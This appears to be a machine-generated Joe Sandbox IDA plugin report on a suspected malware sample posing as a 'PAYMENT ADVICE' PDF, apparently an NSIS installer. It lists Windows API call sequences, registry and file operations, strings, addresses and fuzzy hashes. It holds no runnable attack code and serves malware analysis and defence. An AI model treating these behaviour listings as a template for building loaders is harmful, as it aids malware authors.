                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                    • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                    • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                                                    • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                    • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                                                    APIs
                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                                                      • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                    • String ID: 9
                                                                                                                                    • API String ID: 163830602-2366072709
                                                                                                                                    • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                                    • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                                                    • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                                    • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                    • lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                    • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
                                                                                                                                    • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2531174081-0
                                                                                                                                    • Opcode ID: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                                                    • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                                                    • Opcode Fuzzy Hash: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                                                    • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                                                    • GetMessagePos.USER32 ref: 00404AA1
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                    • String ID: f
                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                    • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                    • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                                                    • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                    • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                                                    APIs
                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                                    • MulDiv.KERNEL32(?,00000064,?), ref: 00402D4D
                                                                                                                                    • wsprintfW.USER32 ref: 00402D5D
                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                                    Strings
                                                                                                                                    • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                    • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                                    • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                                                    • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                                    • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                    • Opcode ID: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                                                    • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                                                                                                                    • Opcode Fuzzy Hash: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                                                    • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                                                                                                                    APIs
                                                                                                                                    • CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                                                    • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                    • CharNextW.USER32(0040A300,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                                                    • CharPrevW.USER32(0040A300,0040A300,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                    • String ID: *?|<>/":
                                                                                                                                    • API String ID: 589700163-165019052
                                                                                                                                    • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                    • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                                                    • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                                    • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                                                    APIs
                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017A8
                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017CD
                                                                                                                                      • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                      • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
                                                                                                                                      • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1941528284-0
                                                                                                                                    • Opcode ID: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                                                    • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                                                    • Opcode Fuzzy Hash: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                                                    • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1912718029-0
                                                                                                                                    • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                    • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                                                    • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                    • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                    • Opcode ID: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                                                    • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                                                    • Opcode Fuzzy Hash: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                                                    • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(?), ref: 00401D59
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                                    • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3808545654-0
                                                                                                                                    • Opcode ID: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                                                    • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                                                    • Opcode Fuzzy Hash: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                                                    • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                    • wsprintfW.USER32 ref: 00404A1A
                                                                                                                                    • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                    • Opcode ID: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                                                    • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                                                    • Opcode Fuzzy Hash: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                                                    • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                                                    APIs
                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                    • String ID: !
                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                    • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                                    • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                                                    • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                                    • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                                                    APIs
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                                    • wsprintfW.USER32 ref: 00406411
                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00406421
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                    • String ID: %s%S.dll
                                                                                                                                    • API String ID: 2200240437-2744773210
                                                                                                                                    • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                    • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                                                    • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                    • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                                                    APIs
                                                                                                                                    • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                                    • lstrlenW.KERNEL32(0040B5F0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933448520.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateValuelstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1356686001-0
                                                                                                                                    • Opcode ID: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                                                    • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                                                    • Opcode Fuzzy Hash: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
